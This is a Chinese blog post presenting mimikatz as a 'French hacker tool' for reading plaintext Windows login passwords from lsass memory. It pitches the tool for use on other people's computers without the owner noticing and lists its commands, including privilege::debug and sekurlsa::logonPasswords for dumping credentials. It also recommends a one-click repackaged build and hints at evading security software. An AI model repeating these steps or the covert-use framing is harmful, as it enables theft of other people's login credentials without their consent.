法国神器直接获取windows登陆密码

 windows登录密码破解也算是老生常谈的问题了，通常情况下都是通过u盘启动器一键清除电脑登录密码，操作方便迅速当然他的弊端也不言而喻，清除密码但无法获知密码，这种情况只能是在自己电脑上密码忘记时采取的最简单最有效的方法，如果在他人电脑上这种方法容易被别人知道，密码你都给人家清除了，还怕人家不发现么！那么有没有一种方法可以不清除密码而是能获得明文密码呢？今天阿刚就给大家介绍一款来自法国黑客的神器，它可以非常迅速显示当前登录系统的明文密码，可谓是相当的强大！

  mimikatz是一款功能强大的轻量级调试神器，通过它你可以提升进程权限注入进程读取进程内存，当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获取当前处于Active系统的登录密码， lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略，通常我们在登陆系统时输入密码之后，密码便会储存在 lsass内存中，经过其 wdigest 和 tspkg 两个模块调用后，对其使用可逆的算法进行加密并存储在内存之中， 而mimikatz正是通过对lsass的逆算获取到明文密码！也就是说只要你不重启电脑，就可以通过他获取到登陆密码，只限当前登陆系统！阿刚把他集成到U盘中想通过PE直接获取登陆密码，但是思败了……！软件有分为32位和64位，大家可以根据系统自行进行测试，另外阿刚这里也收集到了一款国人编译过后版本，无需输入命令双击便可获取密码，不过只限于64位系统！阿刚分别测试过XP windows7 windows8均可获取到密码！

下面简单的介绍一下神器的命令

• cls—————————–清屏
• exit—————————-退出
• version————查看mimikatz的版本
• system::user—–查看当前登录的系统用户
• system::computer——-查看计算机名称
• process::list——————列出进程
• process::suspend 进程名称 —–暂停进程
• process::stop 进程名称———结束进程
• process::modules –列出系统的核心模块及所在位置
• service::list—————列出系统的服务
• service::remove———–移除系统的服务
• service::start stop 服务名称–启动或停止服务
• privilege::list—————列出权限列表
• privilege::enable——–激活一个或多个权限
• privilege::debug—————–提升权限
• nogpo::cmd————打开系统的cmd.exe
• nogpo::regedit ———–打开系统的注册表
• nogpo::taskmgr————-打开任务管理器
• ts::sessions—————–显示当前的会话
• ts::processes——显示进程和对应的pid情况等
• sekurlsa::wdigest—–获取本地用户信息及密码
• sekurlsa::tspkg——获取tspkg用户信息及密码
• sekurlsa::logonPasswords–获登陆用户信息及密码

指令那是相当的多啊，这里只列举这些，详细大家可以去浏览作者的网站学习，只不过都是法文，估计得请谷歌翻一下！！哦，忘了说了作者是Gentil Kiwi！

当然，如果你觉得输入这些指令实在是有些繁琐，你可以使用国人编译过后的版本，双击之后可以直接获取密码无需输入任何指令，不过只限于64位系统，32位系统的童鞋只能手动输入了！

还是喜欢国人编译后的效果，感觉有点像黑客的样子，哈哈….另外不管你使用哪个版本的，如果你电脑上有安全卫士的话，可能会出现错误代码，所以……呵呵…….

mimikatz原版下载地址（包括原32位和64位）